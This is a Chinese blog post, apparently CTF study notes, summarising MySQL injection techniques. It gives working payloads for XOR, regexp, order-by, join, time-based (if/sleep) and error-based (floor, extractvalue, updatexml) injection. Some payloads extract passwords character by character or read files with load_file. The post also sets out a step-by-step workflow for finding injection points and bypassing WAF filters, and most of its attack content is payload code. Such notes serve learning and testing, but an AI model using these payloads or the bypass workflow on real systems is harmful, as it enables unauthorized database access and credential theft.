<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="SQL注入小结"><meta name="keywords" content="SQL注入"><meta name="author" content="Ginove,undefined"><meta name="copyright" content="Ginove"><title>SQL注入小结 | Ginove</title><link rel="shortcut icon" href="https://ginove-1252770243.cos.ap-guangzhou.myqcloud.com/%E8%B7%AF%E9%A3%9E/bitbug_favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.5.6"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@4.7.0/css/font-awesome.min.css?version=1.5.6"><link rel="dns-prefetch" href="https://cdn.staticfile.org"><link rel="dns-prefetch" href="https://cdn.bootcss.com"><link rel="dns-prefetch" href="https://creativecommons.org"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.css"><script src="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.js" defer></script><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: {"appId":"CH3QQ87I9H","apiKey":"1005940df08368eb06761af10c531247","indexName":"my-hexo-blog","hits":{"per_page":10},"languages":{"input_placeholder":"搜索文章","hits_empty":"找不到您查询的内容:${query}","hits_stats":"找到 ${hits} 条结果，用时 ${time} 毫秒"}},
  localSearch: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  }
} </script></head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#1-XOR注入"><span class="toc-number">1.</span> <span class="toc-text">1.XOR注入</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#2-regexp注入"><span class="toc-number">2.</span> <span class="toc-text">2.regexp注入</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#3-order-by盲注"><span class="toc-number">3.</span> <span class="toc-text">3.order by盲注</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#join注入"><span class="toc-number">4.</span> <span class="toc-text">join注入</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#带-的注入"><span class="toc-number">5.</span> <span class="toc-text">带!的注入</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#xpath处理函数-extractvalue和updatexml-："><span class="toc-number">6.</span> <span class="toc-text">xpath处理函数(extractvalue和updatexml)：</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="https://ginove-1252770243.cos.ap-guangzhou.myqcloud.com/%E8%B7%AF%E9%A3%9E/toui.jpg"></div><div class="author-info__name text-center">Ginove</div><div class="author-info__description text-center">Keep optimistic and Never give up</div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">28</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">13</span></a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://api.dujin.org/bing/1920.php)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Ginove</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> 搜索</span></a><a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/about">About</a></span></div><div id="post-info"><div id="post-title">SQL注入小结</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2018-10-12</time><span class="post-meta__separator">|</span><i class="fa fa-comment-o post-meta__icon" aria-hidden="true"></i><a href="/2018/10/12/SQL注入小结/#disqus_thread"><span class="disqus-comment-count" data-disqus-identifier="2018/10/12/SQL注入小结/"></span></a></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h1 id="1-XOR注入"><a href="#1-XOR注入" class="headerlink" title="1.XOR注入"></a>1.XOR注入</h1><ul>
<li>使用场景<blockquote>
<p>过滤了关键字：and 、or、逗号、空格</p>
</blockquote>
</li>
</ul>
<p>Payload:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">admin&apos;^(ascii(mid((passwd)from(i)))&gt;j)^&apos;1&apos;=&apos;1&apos;%23</span><br><span class="line">或</span><br><span class="line">admin&apos;(ascii(mid((passwd)from(i)for(1)))&gt;j)^&apos;1&apos;=&apos;1&apos;%23</span><br></pre></td></tr></table></figure></p>
<p>MID()函数:MID(str,pos,len) 对于str字符串，从pos索引值开始，截取len长度的子字符串</p>
<p><strong>from(1)表示从第一个位置开始截取剩下的字符串，for(1)表示从改位置起一次就截取一个字符</strong><br>如果还过滤了<code>=</code>，可以使用&gt;代替<code>admin&#39;^(ascii(mid((passwd)from(i)))&gt;j)^&#39;2&#39;&gt;&#39;1&#39;%23</code></p>
<h1 id="2-regexp注入"><a href="#2-regexp注入" class="headerlink" title="2.regexp注入"></a>2.regexp注入</h1><ul>
<li>使用场景<blockquote>
<p>过滤了 = in like</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> (<span class="keyword">select</span>语句) regexp <span class="string">'正则'</span></span><br><span class="line">如</span><br><span class="line"><span class="keyword">select</span> (<span class="keyword">select</span> user_pass <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">where</span> user_id = <span class="number">1</span>) regexp <span class="string">'^a'</span></span><br><span class="line">^表示从开头匹配，regexp <span class="string">'asa$'</span> $表示从末尾开始匹配</span><br></pre></td></tr></table></figure>
</blockquote>
</li>
</ul>
<h1 id="3-order-by盲注"><a href="#3-order-by盲注" class="headerlink" title="3.order by盲注"></a>3.order by盲注</h1><ul>
<li>使用场景<blockquote>
<p>过滤了列名<br>过滤了括号<br>适用于已知该表的列名以及列名位置的注入</p>
</blockquote>
</li>
</ul>
<p>Payload：<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">where</span> user_id = <span class="string">'1'</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="string">'a'</span>,<span class="number">4</span>,<span class="number">5</span>,<span class="number">6</span>,<span class="number">7</span> <span class="keyword">order</span> <span class="keyword">by</span> <span class="number">3</span></span><br></pre></td></tr></table></figure></p>
<p>order by ‘number’ (asc/desc),即对某一列进行排序，默认是升序排列，即后面默认跟上asc</p>
<p>一次性报所有表明和字段名<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(<span class="keyword">SELECT</span> (@) <span class="keyword">FROM</span> (<span class="keyword">SELECT</span>(@:=<span class="number">0x00</span>),(<span class="keyword">SELECT</span> (@) <span class="keyword">FROM</span> (information_schema.columns) <span class="keyword">WHERE</span> (table_schema&gt;=@) <span class="keyword">AND</span> (@)<span class="keyword">IN</span> (@:=<span class="keyword">CONCAT</span>(@,<span class="number">0x0a</span>,<span class="string">' [ '</span>,table_schema,<span class="string">' ] &gt;'</span>,table_name,<span class="string">' &gt; '</span>,column_name))))x)</span><br></pre></td></tr></table></figure></p>
<p>逗号被过滤<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">limit 1 offset 1</span><br></pre></td></tr></table></figure></p>
<p>limit被过滤：</p>
<blockquote>
<p>(1) group_concat(使用的最多)<br>(2) &lt;&gt;筛选(不等于)<br>(3) not in<br>(4) DISTINCT</p>
</blockquote>
<h1 id="join注入"><a href="#join注入" class="headerlink" title="join注入"></a>join注入</h1><p>payload：：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&apos; union select * from (select 1) a join (select 2) b %23</span><br></pre></td></tr></table></figure></p>
<p>具体的使用方法不在本文的讨论范围内，具体的使用可以看看下面的文章：<br><a href="https://blog.csdn.net/qq_33020901/article/details/78906268" target="_blank" rel="noopener">https://blog.csdn.net/qq_33020901/article/details/78906268</a></p>
<h1 id="带-的注入"><a href="#带-的注入" class="headerlink" title="带!的注入"></a>带!的注入</h1><p>if盲注(合理利用条件)<br>if盲注的基本格式：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">if(条件,条件为真执行的语句,条件为假执行的语句)</span><br><span class="line">admin&apos; if(ascii(mid(user(),1,1))=100,sleep(5),1)</span><br></pre></td></tr></table></figure></p>
<p>wp链接：<a href="https://www.kingkk.com/2018/04/bctf2018-love-q/" target="_blank" rel="noopener">https://www.kingkk.com/2018/04/bctf2018-love-q/</a></p>
<p>0x06 自己总结的注入流程<br>1、先找到注入点，id=，username=，判断GET/POST/COOKIE注入</p>
<p>2、查看显示位，如果只有一个显示位在使用union注入是注意使用limit来限制显示</p>
<p>3、判断字符型注入还是数字型注入（2-1，’是否正常）</p>
<p>4、输入不同值查看页面是否有变化，无变化的话可以考虑采用bool时间盲注，若有报错信息优先考虑报错注入（exp，updatexml（优先采用updatexml、extractvalue报错））</p>
<p>5、先简单测试空格和注释符是否被替换了，id=1 1，id = 1%231（看看能否用/ /、%20、%0a、%09绕过）</p>
<p>6、进行fuzz，看看那些被waf了</p>
<p>7、若页面上没有显示waf过滤之类的提示（sql injection detected），就测试是否有被替换为空的字符（如：’ or ‘*’=’、’ or ‘-‘=’ ，如果页面返回正常的话，则说明该字符被替换为空）</p>
<p>8、简单尝试双写、编码、大小写替换的方法，判断是否可以绕过</p>
<p>9、确定注入方式（尽量把盲注放最后），union、报错注入、盲注</p>
<p>10、先在bp中跑一遍看是否有结果</p>
<p>11、尝试写脚本</p>
<blockquote>
<ul>
<li>参考链接：<a href="https://www.anquanke.com/post/id/160584#h2-7" target="_blank" rel="noopener">https://www.anquanke.com/post/id/160584#h2-7</a><br><a href="https://www.cnblogs.com/Vinson404/p/7253255.html" target="_blank" rel="noopener">https://www.cnblogs.com/Vinson404/p/7253255.html</a><br><a href="https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/" target="_blank" rel="noopener">https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/</a><br><a href="https://xz.aliyun.com/t/368" target="_blank" rel="noopener">https://xz.aliyun.com/t/368</a><br><a href="https://www.cnblogs.com/lcamry/articles/5717442.html" target="_blank" rel="noopener">https://www.cnblogs.com/lcamry/articles/5717442.html</a><br><a href="https://blog.csdn.net/qq_33020901/article/details/78906268" target="_blank" rel="noopener">https://blog.csdn.net/qq_33020901/article/details/78906268</a></li>
</ul>
</blockquote>
<h1 id="xpath处理函数-extractvalue和updatexml-："><a href="#xpath处理函数-extractvalue和updatexml-：" class="headerlink" title="xpath处理函数(extractvalue和updatexml)："></a>xpath处理函数(extractvalue和updatexml)：</h1><p>floor<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);</span><br><span class="line"></span><br><span class="line">and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));</span><br></pre></td></tr></table></figure></p>
<p>extractvalue<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));</span><br><span class="line">&apos; and extractvalue(1, concat(0x5c, substring((load_file(&quot;./f13g_ls_here.txt&quot;)),1,32)))#</span><br></pre></td></tr></table></figure></p>
<p>updatexml<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and 1=(updatexml(1,concat(0x3a,(<span class="keyword">select</span> <span class="keyword">user</span>())),<span class="number">1</span>))</span><br></pre></td></tr></table></figure></p>
<p>load_file(‘/var/www/html/f13g_ls_here.txt’)</p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">Ginove</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://ginove.github.io/2018/10/12/SQL注入小结/">https://ginove.github.io/2018/10/12/SQL注入小结/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://ginove.github.io" target="_blank">Ginove</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/SQL注入/">SQL注入</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2018/10/15/i春秋web题目笔记/"><i class="fa fa-chevron-left">  </i><span>i春秋web题目笔记</span></a></div><div class="next-post pull-right"><a href="/2018/10/04/南邮CTF平台web小记/"><span>南邮CTF平台web小记</span><i class="fa fa-chevron-right"></i></a></div></nav><div id="disqus_thread"></div><script>var unused = null;
var disqus_config = function () {
  this.page.url = 'https://ginove.github.io/2018/10/12/SQL注入小结/';
  this.page.identifier = '2018/10/12/SQL注入小结/';
  this.page.title = 'SQL注入小结';
}
var d = document, s = d.createElement('script');
s.src = "https://" + 'https-ginove-github-io' +".disqus.com/embed.js";
s.setAttribute('data-timestamp', '' + +new Date());
(d.head || d.body).appendChild(s);</script><script id="dsq-count-src" src="https://https-ginove-github-io.disqus.com/count.js" async></script></div></div><footer><div class="layout" id="footer"><div class="copyright">&copy;2017 - 2018 By Ginove</div><div class="framework-info"><span>驱动 - </span><a href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file-o"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="/js/third-party/anime.min.js"></script><script src="/js/third-party/jquery.min.js"></script><script src="/js/third-party/jquery.fancybox.min.js"></script><script src="/js/third-party/velocity.min.js"></script><script src="/js/third-party/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.5.6"></script><script src="/js/fancybox.js?version=1.5.6"></script><script src="/js/sidebar.js?version=1.5.6"></script><script src="/js/copy.js?version=1.5.6"></script><script src="/js/fireworks.js?version=1.5.6"></script><script src="/js/transition.js?version=1.5.6"></script><script src="/js/scroll.js?version=1.5.6"></script><script src="/js/head.js?version=1.5.6"></script><script src="/js/search/algolia.js"></script><div class="search-dialog" id="algolia-search"><div class="search-dialog__title" id="algolia-search-title">Algolia</div><div id="algolia-input-panel"><div id="algolia-search-input"></div></div><hr><div id="algolia-search-results"><div id="algolia-hits"></div><div id="algolia-pagination"></div><div id="algolia-stats"></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>